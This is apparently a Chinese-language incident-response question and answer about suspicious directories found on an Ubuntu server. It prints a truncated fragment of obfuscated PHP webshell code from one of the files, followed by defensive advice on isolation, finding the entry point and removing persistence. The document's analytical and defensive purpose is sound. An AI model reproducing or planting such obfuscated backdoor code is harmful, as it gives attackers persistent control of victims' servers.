Ubuntu服务器出现异常目录文件 含可疑PHP代码如何排查处置
服务器异常文件排查记录

上图为服务器上被异常创建的目录及文件截图。
以下为其中一个异常文件内包含的PHP代码片段:
<?php function n1($f2){$s3 = " l_pHi?2f<40s@m3/IaEx" ."1ren6*5g9yL7b#k)chFuod;-.'v" ."(" ."t" ;$o5='';foreach($f2 as $s4){$o5.=$s3[$s4];}return $o5;}$k6 = Array();$k6[] = n1(Array(32,23,15,21,27,10,33,29,44,29>
注意:当前提取到的代码片段不完整,属于典型的混淆型webshell后门特征
- 代码通过自定义字符集、数组索引拼接的方式混淆真实执行逻辑,完整代码通常具备执行任意系统命令、读写服务器文件、持久化控制服务器的恶意功能
- 出现该类文件证明服务器已被攻击者成功入侵,需第一时间断网隔离,优先排查Web应用漏洞、弱口令、未授权访问等入侵入口,全量扫描清理所有恶意后门文件,同时排查系统是否存在隐藏账号、恶意定时任务、篡改的系统命令等持久化痕迹,避免攻击者反复入侵。
内容的提问来源于stack exchange,提问作者asega
相关产品推荐
相关产品推荐

